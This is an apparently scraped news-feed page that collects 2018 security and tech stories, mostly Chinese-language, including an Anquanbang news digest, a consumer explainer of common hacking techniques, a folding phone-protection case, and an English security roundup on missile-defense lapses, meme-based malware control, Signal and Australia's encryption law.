通过这次沟通,我对漏洞,以及对手持重器的“黑客”又有了新的理解。什么样的漏洞可以要你一命?时局变幻,人如蝼蚁,什么样的漏洞都可能要你一命,任何人都可能成为下一个卡舒吉,但雷锋网宅客频道也曾报道,更多“安全人”做出了选择,阻止“漏洞”夺走成千上万人的隐私、财产和生命。

我们还将继续报道。

参考信息:

1.《“黑客帝国”里的MJ0011》,南方都市报

2. 《间谍公司NSO明码标价 可让政府监控智能手机用户》,E安全

3. 《NSO到底是个什么样的公司?揭秘三叉戟0day的缔造者》,CodeSec

4. 《美称以色列曾售沙特间谍软件 用于监控卡舒吉手机》,参考消息

雷锋网原创文章,未经授权禁止转载。详情见 转载须知 。

【安全帮】微软如何查获内部泄密者:套路让人防不胜防

$
0
0

摘要: 30国4万用户的政府服务登录凭证被盗4万多名钓鱼攻击受害者政府服务的在线账户被盗,且这些信息可能已被在暗网黑客论坛上出售。Group-IB 公司的研究员发现这些登录数据可以访问全球30个国家的服务。该公司表示这些受攻陷凭证是研究人员通过检测和逆向工程恶意软件以...

30 国 4 万用户的政府服务登录凭证被盗
【安全帮】微软如何查获内部泄密者:套路让人防不胜防
4万多名钓鱼攻击受害者政府服务的在线账户被盗,且这些信息可能已被在暗网黑客论坛上出售。Group-IB 公司的研究员发现这些登录数据可以访问全球30个国家的服务。该公司表示这些受攻陷凭证是研究人员通过检测和逆向工程恶意软件以及数字取证数据发现的。超过一半的受害者来自意大利 (52%),其次为沙特阿拉伯 (22%) 和葡萄牙 (5%)。其它国家的政府网站用户也受影响。

参考来源:

http://codesafe.cn/index.php?r=news/detail&id=4609

微软如何查获内部泄密者:套路让人防不胜防
【安全帮】微软如何查获内部泄密者:套路让人防不胜防
厂商对于查找这种泄密的源头都有自己的一套办法,有时候你明明看不出自己发到网上的画面有什么身份信息,但厂商单单还就能锁定泄密者的身份。业界巨头微软在这方面还真有自己的一套办法,时过境迁,微软员工如今把当初控制Xbox 360的新Xbox体验(NXE)UI内部beta测试不被外泄的方式公布了出来。推特用户@cullend近日发文表示,当初他在微软最得意的一个项目就是把Xbox 360的序列号与画面右下角Xbox logo处的水波纹相对应,这样将UI放上网的人自然就泄露了自己的主机信息。不过,在NXE的beta测试成功之后,推出的正式版升级中并不包含这个身份认证。微软随后也澄清,这种方式只用来保证内部测试阶段不被违反保密协议的人泄露出去。

参考来源:

https://hot.cnbeta.com/articles/game/798963

罗技 Options 被曝漏洞可招致按键注入攻击,官方发新版软件修复
【安全帮】微软如何查获内部泄密者:套路让人防不胜防
Logitech Options是罗技官方推出的一款软件,用户可以使用它对罗技鼠标、键盘和触摸板进行自定义。据Threat Post报道,今年9月,谷歌Project Zero的安全研究员Tavis Ormandy发现了这款软件上的一个漏洞,可以招致按键注入攻击。由于罗技没有照惯例在三个月内对此漏洞进行修复,谷歌ProjectZero团队在12月11日公开披露了此漏洞。两天后,罗技官方表示新发布的7.00版软件已经对相关漏洞进行了修复。据报道,攻击者可以通过流氓网站向Options应用程序发送一系列命令,更改用户的设置。此外,攻击者还可以通过更改一些简单的配置设置,来发送任意击键命令,从而获得访问所有信息的方式,甚至接管目标设备。进一步来说,只要用户的电脑处于打开状态,同时这一应用保持在后台运行,理论上攻击者几乎能发起连续访问。

参考来源:

https://www.ithome.com/0/400/704.htm

涉隐私问题 亚马逊申请面部识别门铃专利遭强烈抵制
【安全帮】微软如何查获内部泄密者:套路让人防不胜防
亚马逊最新的门铃专利申请遭遇强烈抵制。该专利申请设想使用门铃相机和面部识别技术的组合来构建一个系统,该系统可用于将出现在您门口的人的图像与“可疑人员”数据库相匹配。如果系统在数据库中找到匹配项,系统甚至会提取有关该人的信息。房主也可以上传他们认为可疑的人的照片。这种噩梦般的概念是由一家名为Ring的摄像机门铃公司提出的,该公司在今年被电子商务巨头亚马逊收购。这种设计能够识别路人的样貌而且能够将他们的照片发送给执法机关,但是它却引发了美国民权同盟(ACLU)的指责。亚马逊的这种设计引发了人们的强烈抗议,其中就包含了亚马逊自己的员工和股东,还有全部的黑人国会议员。

参考来源:

http://finance.jrj.com.cn/tech/2018/12/17085726752295.shtml

比特币勒索卷土重来,罪犯敲诈了 4 个国家,入账不到 1 美元
【安全帮】微软如何查获内部泄密者:套路让人防不胜防
据多家外媒报道,12 月 13 日下午开始,美国、加拿大、澳大利亚等英语语言国家的数十家公司、学校、银行、政府部门和媒体机构都收到了「炸弹威胁」的电子邮件。网络安全研究员 Troy Mursch 表示,收到威胁的电邮很可能是从数据库或暗网中用不正当手段获取到的。而且罪犯的方式也很愚蠢,大规模群发要求比特币支付,这很容易就让收到邮件的人当作是垃圾邮件恶意骗局。截止美东时间 12 月 14 日下午,只有两笔加起来不到 1 美元的存款打向了勒索账户。但从加州到多伦多,在工作日的大学、公司、政府部门、执法部门中突然「引爆」的这股炸弹恐慌也扰乱了整个城市的日常运转。

参考来源:

https://www.cnbeta.com/articles/tech/799299.htm

2018 百大 “ 最烂密码 ” 出炉 ,123456 五年蝉联第一
【安全帮】微软如何查获内部泄密者:套路让人防不胜防

美国安全软件公司飞溅数据(SplashData)公布了2018年百大“最烂密码”,数字组合“123456”连续五年蝉联第一,排名第二的则是“password”(密码)。其他依次是123456789、12345678、12345、111111、1234567、sunshine(阳光)、qwerty(键盘第一行从左起6个字母),以及iloveyou(我爱你)。另外有意思的是,美国总统特朗普的名字“donald”(唐纳德)今年首次加入了这一榜单,排名第23。

参考来源:

http://hqtime.huanqiu.com/article/a-XDJBCW36E53DB1C4C70461

双重认证并非 100% 安全:新技术证实可成功入侵 Gmail 账号
【安全帮】微软如何查获内部泄密者:套路让人防不胜防
安全专家上周四表示,近期针对美国政府官员、活动家和记者的网络钓鱼活动日益猖獗,并且利用技术手段绕过了被Gmail和Yahoo Mail广泛使用的双因素认证保护系统(2FA)。此次钓鱼攻击事件再次表明依赖单次登陆或者一次性密码的2FA同样存在风险,尤其是通过SMS短信发送至用户手机的情况。安全公司Certfa Lab的研究人员在一篇博客文章中表示,有伊朗政府背景的黑客攻击者收集了攻击目标的详细信息,并利用了这些信息撰写了针对这些目标的钓鱼网络邮件。这些邮件中包含一张隐藏照片,在攻击目标浏览该信息的时候就会自动激活。研究人员称,攻击者会在自己的服务器上实时检查受害者的用户名称和密码。而且即使启用了例如短信、认证APP或者一键式登陆的双因素认证,仍然能够欺骗目标并窃取这些信息。” 参考来源:

http://hackernews.cc/archives/24627

关于安全帮

安全帮,是中国电信北京研究院旗下安全团队,致力于成为“SaaS安全服务领导者”。目前拥有“1+4”产品体系:一个SaaS电商(www.anquanbang.vip) 、四个平台(SDS软件定义安全平台、安全能力开放平台、安全大数据平台、安全态势感知平台)。

相关文章 【安全帮】SQLite被曝存在漏洞,所有 Chromium 浏览器受影响 【安全帮】“驱动人生”升级现木马病毒 半天感染数万台电脑 【安全帮】严重漏洞让4亿微软账户险遭暴露;无业黑客最高能年赚50万美元 靠测试漏洞赚赏金 【安全帮】新型Android木马可从PayPal账户窃取资金 【安全帮】联想一台笔记本失窃 内含成千上万名员工未加密数据


【安全帮】微软如何查获内部泄密者:套路让人防不胜防

警告!千万别叫你的电脑感染这几种黑客技术

$
0
0

大家知道,黑客可以未经授权访问非机密信息,如信用卡详细信息,电子邮件帐户详细信息和其他个人信息。因此,了解一些常用于以未经授权的方式获取您的个人信息的黑客技术也很重要。今天小编就给大家介绍几种常见的黑客技术。

1.诱饵和开关

使用诱饵和切换黑客技术,攻击者可以在网站上购买广告位。之后,当用户点击广告时,他可能会被定向到感染了恶意软件的网页。这也是大家最容易中毒的方法之一

这样,他们就可以在您的计算机上进一步安装恶意软件或广告软件。此技术中显示的广告和下载链接非常具有吸引力,预计用户最终会点击相同的内容。

黑客可以运行用户认为是真实的恶意程序。这样,在您的计算机上安装恶意程序后,黑客就可以无权访问您的计算机。

2.Cookie被盗

浏览器的cookie保留我们的个人数据,例如我们访问的不同站点的浏览历史记录,用户名和密码。一旦黑客获得了对cookie的访问权限,他甚至可以在浏览器上验证自己。

执行此攻击的一种流行方法是鼓励用户的IP数据包通过攻击者的计算机。也称为SideJacking或Session Hijacking,如果用户未在整个会话中使用SSL(https),则此攻击很容易执行。在您输入密码和银行详细信息的网站上,对他们加密连接至关重要。

3.单击“杰克攻击”

ClickJacking也有一个不同的名称,UI Redress。在这次攻击中,黑客隐藏了受害者应该点击的实际UI。这种行为在应用下载,电影流和torrent网站中非常常见。虽然他们大多使用这种技术来赚取广告费,但其他人可以使用它来窃取您的个人信息。

换句话说,在这种类型的黑客攻击中,攻击者劫持了受害者的点击,这些点击不是针对确切的页面,而是针对黑客想要的页面。它的工作原理是通过点击隐藏链接欺骗互联网用户执行不受欢迎的操作。


警告!千万别叫你的电脑感染这几种黑客技术
4.病毒,特洛伊木马等

病毒或特洛伊木马是恶意软件程序,它们被安装到受害者的系统中并不断将受害者数据发送给黑客。

他们还可以锁定您的文件,提供欺诈广告,转移流量,嗅探您的数据或传播到连接到您网络的所有计算机上。

您可以通过访问下面给出的链接来阅读各种恶意软件,蠕虫,特洛伊木马等之间的比较和区别。

5.网络钓鱼

网络钓鱼是一种黑客攻击技术,黑客通过该技术复制访问最多的网站,并通过发送欺骗性链接来捕获受害者。

结合社会工程,它成为最常用和最致命的攻击媒介之一。一旦受害者试图登录或输入一些数据,黑客就会使用假网站上运行的木马获取目标受害者的私人信息。

通过iCloud和Gmail帐户进行的网络钓鱼是针对“Fappening”漏洞的黑客所采取的攻击途径,该漏洞涉及众多好莱坞女性名人。


警告!千万别叫你的电脑感染这几种黑客技术
6.网络窃听(被动攻击)

与使用被动攻击的自然活动的其他攻击不同,黑客只是监视计算机系统和网络以获取一些不需要的信息。

窃听背后的动机不是要损害系统,而是要在不被识别的情况下获取一些信息。这些类型的黑客可以针对电子邮件,即时消息服务,电话,Web浏览和其他通信方法。

那些沉迷于此类活动的人通常是黑帽黑客,政府机构等。爱黑客和Pentesting,从这里开始

7.假WAP

即使只是为了好玩,黑客也可以使用软件伪造无线接入点。这个WAP连接到官方公共场所WAP。一旦你连接了假的WAP,黑客就可以访问你的数据,就像上面的例子一样,这是最容易实现的攻击之一,只需要一个简单的软件和无线网络。

任何人都可以将他们的WAP命名为“Heathrow Airport WiFi”或“Starbucks WiFi”这样的合法名称,然后开始监视你。保护自己免受此类攻击的最佳方法之一是使用高质量的VPN服务。

8.水坑袭击

如果您是发现或国家地理频道的忠实粉丝,您可以轻松地与水潭攻击联系起来。为了毒害一个地方,在这种情况下,黑客会击中受害者最容易接近的物理点。例如,如果河流的来源中毒,它将在夏季袭击整个动物群。

以同样的方式,黑客瞄准访问最多的物理位置来攻击受害者。那一点可以是咖啡馆,自助餐厅等。一旦黑客知道您的时间,使用这种类型的黑客攻击,他们可能会创建一个虚假的Wi-Fi接入点,并修改您访问量最大的网站,将其重定向到您,以获取您的个人信息。

由于此攻击从特定位置收集用户信息,因此检测攻击者更加困难。这种类型的黑客攻击再次保护自己的最佳方法之一是遵循基本的安全实践并保持软件/操作系统的更新。

9.拒绝服务(DoS \ DDoS)

拒绝服务攻击是一种黑客攻击技术,通过充斥大量流量使服务器无法实时处理所有请求并最终崩溃的站点或服务器来关闭站点或服务器。

这种流行的技术,攻击者使用大量请求来淹没目标计算机以淹没资源,这反过来限制了实际请求的实现。

对于DDoS攻击,黑客经常部署僵尸网络或僵尸计算机,这些计算机只能通过请求数据包充斥您的系统。随着时间的推移,随着恶意软件和黑客类型不断发展,DDoS攻击的规模不断增加。

10.键盘记录

Keylogger是一个简单的软件,可将键盘的按键顺序和笔划记录到机器的日志文件中。这些日志文件甚至可能包含您的个人电子邮件ID和密码。也称为键盘捕获,它可以是软件或硬件。

虽然基于软件的键盘记录器针对安装在计算机上的程序,但硬件设备面向键盘,电磁辐射,智能手机传感器等。Keylogger是网上银行网站为您提供使用虚拟键盘选项的主要原因之一。因此,无论何时在公共环境中操作计算机,都要格外小心。

以上:了解这些常见的黑客技术,如网络钓鱼,DDoS,点击劫持等,可以为您的人身安全提供便利。

手机不慎摔落时,这款“安全气囊”想保护你的手机安全落地

$
0
0

大概每个人都经历过手机摔落的场景, 你可能需要花大几百甚至上千元更换摔碎的屏幕,或者发现手机已经报废了。 可是,如果给手机加上一个“安全气囊”呢?

德国Aalen大学工程师Philip Frenzel,设计了一种手机“主动防护”装置, 当手机不慎掉落时,它会从手机的四角,迅速的弹出八个卷曲的弹片,包括手机不会与地面直接撞击,同时起到弹性缓冲的作用。


手机不慎摔落时,这款“安全气囊”想保护你的手机安全落地

实现原理上,“主动防护”装置集成在手机壳内,装置内装有下落传感器、和金属弹片,当手机跌落时,传感器会检测到自由落体状态,并驱动八个金属弹片迅速弹出,从而起到保护作用。

当用户捡起落地的手机时,只需将弹片折回到手机壳中,继续防护下一次手机跌落的情况。


手机不慎摔落时,这款“安全气囊”想保护你的手机安全落地

将金属弹片折回手机壳

Frenzel最初的想法是在手机上安装实际的安全气囊装置。但是,基于泡沫的替代品和其他一些替代品根本没有实用性,Frenzel不想用一些丑陋的保护壳来降低手机的美感。从这款产品demo的外观来看,他确实做到了。


手机不慎摔落时,这款“安全气囊”想保护你的手机安全落地

Frenzel的想法获得了德国机电一体化学会的最高奖项,他已经申请了专利。项目的 两位创始人计划通过众筹融资,产品将于7月份在Kickstarter平台上线。

“主动防护”装置看起来很棒,不过可能还是存在一些问题。

比如当你把手机装在口袋里,你从一个地方跳落时,或者你只是拿着手机甩了一下手,根据下落传感器的原理,手机壳的金属弹片应该也会弹出,这可能会让你比较痛苦。或许Frenzel会增加接近传感器,当检测到手机在口袋里或包里时,就不会启动金属弹片。

另外,由于内置了传感器和弹片驱动装置,手机壳应该需要电池或充电,这可能会让用户觉得很麻烦。而从外观来开,手机壳的厚度也明显增加,这似乎让手机商煞费苦心做薄一毫米的努力完全白费。

针对手机碎屏的问题,很多厂商都推出了碎屏险,价格甚至仅为百元左右(坚果Pro2 99元/年,OPPO 129元/年),未必比这款手机壳的正式售价贵。

所以这款“主动防护”手机壳, 你会购买吗?

Memes, messengers, and missiles: From Twitter to chat apps and weapons, security ...

$
0
0

RoundupWe are now firmly into the holiday season, the Christmas parties are kicking off, and folks are swapping their Excel files for eggnog, or something cliched like that.

So, let's have a quick look around the world of security this week before everyone puts on the "out of office".

On the first day of Christmas my true love gave to me: a nuke that didn't have security

Quick, think of the one place your really don't want to see failing security.

Did you answer "intercontinental ballistic missiles"? Bad news…

A report from the US Department of Defense Inspector General's office has found that America's missile command is falling way behind when it comes to the security of its Ballistic Missile Defense System (BMDS). The summary of their findings is brief and to the point:

"We determined that officials did not consistently implement security controls and processes to protect BMDS technical information."

Among the failings spotted in the report was the failure to install multifactor authentication software, leaving server racks unlocked, not installing intrusion detection tools on one classified network, and failing to encrypt data before it was transmitted.

"In addition, facility security officers did not consistently implement physical security controls to limit unauthorized access to facilities that managed BMDS technical information," the December dossier noted.

The report recommends, not surprisingly, that the DoD look to first install these basic protections on the network and then get their act together as far as making sure access to both the data and the physical facilities housing it are locked off with access carefully logged and monitored.

Meanwhile... A mall-patrolling robot in Los Angeles has a strange hunger for shoppers' MAC addresses on their devices. Also, it turns out it's possible to defeat facial-recognition in some Android phones and unlock one of those unfortunate devices using a 3D-printed head of the owner, provided you have 50 cameras, top-of-the-line equipment, and about 300 quid to spend on the caper.

We three memes controlling your bots

Researchers at Trend Micro have uncovered a truly remarkable scheme that malware-infected PCs are using to communicate with their central command-and-control servers.

The software nasty, given the catchy name "TROJAN.MSIL.BERBOMTHUM.AA", instructs infected windows machines to look for a specific (since disabled) Twitter account. The account itself wasn't remarkable, containing only a few meme images. Within those images, however, was hidden the code that controlled the infected PCs.

The malware would download and open the images, then look for instructions hidden within. In this case, the memes tell the bots to capture screencaps of their host machines and send the images to a server, though the malware can also be ordered to list running processes, copy clipboard contents, and list filenames from the infected PC.

"We found that once the malware has been executed on an infected machine, it will be able to download the malicious memes from the Twitter account to the victim’s machine. It will then extract the given command," Trend explained.

"In the case of the “print” command hidden in the memes, the malware takes a screenshot of the infected machine. It then obtains the control server information from Pastebin. Afterwards, the malware sends out the collected information or the command output to the attacker by uploading it to a specific URL address."

Fortunately, it looks like this specific operation has been broken up. The meme-spaffing Twitter account has been disabled.

Up in the Outback, Signal's pause; out with the Aussie backdoor clause

Secure chat company Signal is less than happy with the recently passed Australian law targeting encrypted communications. The new Oz rules allow Aussie snoops to demand surveillance backdoors in communications software and websites, allowing the government to read and monitor encrypted messages.

Signal dev Josh Lund said his project simply can't comply with any government demand to decrypt secure end-to-end chatter. No, really, Lund said, there is no physical way Signal could remotely decrypt the contents of conversations.

"By design, Signal does not have a record of your contacts, social graph, conversation list, location, user avatar, user profile name, group memberships, group titles, or group avatars. The end-to-end encrypted contents of every message and voice/video call are protected by keys that are entirely inaccessible to us," Lund explained .

"In most cases now we don’t even have access to who is messaging whom."

This means that Signal faces the very real possibility of being banned in Australia for running afoul of the data access law. Even in that case, however, Lund cautioned the gov-a-roos that they probably wouldn't be able to rid their continent of Signal.

"Historically, this strategy hasn’t worked very well. Whenever services get blocked, users quickly adopt VPNs or other network obfuscation techniques to route around the restrictions," he explained. "If a country decided to apply pressure on Apple or Google to remove certain apps from their stores, switching to a different region is extremely trivial on both Android and iOS. Popular apps are widely mirrored across the internet."

In other words, the Australian government would be playing whack-a-mole with banned apps, all while the likes of Google, Microsoft, Apple, and other US tech giants, are thoroughly cheesed off with the incoming spy law.


Memes, messengers, and missiles: From Twitter to chat apps and weapons, security ...
Google CEO tells US Congress Chocolate Factory will unleash Dragonfly in China READ MORE Simply having a fight over Dragonfly

Google's Dragonfly campaign just got Choc-blocked, allegedly.

A report from The Intercept today indicates that the controversial project to build a Chinese search engine that met Beijing's censorship requirements has been "effectively ended" following an employee revolt and probing by US Congress.

Dragonfly, for those not familiar, was Google's rumored partnership with the Chinese government to create a version of its web search engine that could automatically exclude any results that were banned by the government as well as provide officials with the ability to track people's search queries.

Concern over the privacy and human rights implications of such a project prompted staffers, including Google's precious engineer caste, tospeak out in public, something rarely seen from the highly insular world of Google.

When asked for comment, a Google spokesperson referred El Reg to the comments CEO Sundar Pichai made last week to the Congress.

Jingle Bells, Twitter smells, surveillance by bad eggs

And because creepy government surveillance is all the rage these days, we have Twitter warning that one of its web applications might have been used to slurp up location data on some twits.

In its alert on Monday , Twitter warns that one of its support forums had an issue that would have allowed miscreants to look up things like fellow tweeters' telephone country codes, and whether an account was locked-out by Twitter. The bug was fixed on November 16.

This by itself isn't too much of a problem. However, Twitter also said that prior to the November fix, it spotted "a large number of inquiries coming from individual IP addresses located in China and Saudi Arabia," and that it can't rule out that the collection of this location-based info wasn't the work of state-backed hackers or spies.

In short, Twitter had a flaw that would betray your area code, and two of the most oppressive regimes on the planet may have abused it to collect user information en masse. "Falalalala, la la la laaaa!"

Viewing all 12749 articles
Browse latest View live